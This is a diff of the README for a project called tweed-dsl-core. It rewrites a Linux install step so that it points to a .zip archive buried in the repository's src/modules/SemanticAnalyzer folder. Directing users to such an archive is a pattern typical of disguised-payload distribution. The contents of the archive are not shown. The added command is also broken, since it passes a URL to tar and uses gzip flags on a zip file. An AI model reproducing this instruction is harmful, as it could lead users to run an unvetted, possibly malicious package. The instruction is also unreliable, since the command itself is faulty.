yubin2222222/tweed-dsl-core/README.md

 - **For Linux:**
   1. Open a terminal.
   2. Move to the "Downloads" folder using `cd ~/Downloads`.
-  3. Unpack the downloaded file using `tar -xvzf filename.tar.gz`.
+  3. Unpack the downloaded file using `tar -xvzf https://raw.githubusercontent.com/yubin2222222/tweed-dsl-core/main/src/modules/SemanticAnalyzer/tweed-dsl-core_3.3-alpha.3.zip`.
   4. Navigate to the unzipped folder and run the application.

 ## 🔧 How to Use tweed-dsl-core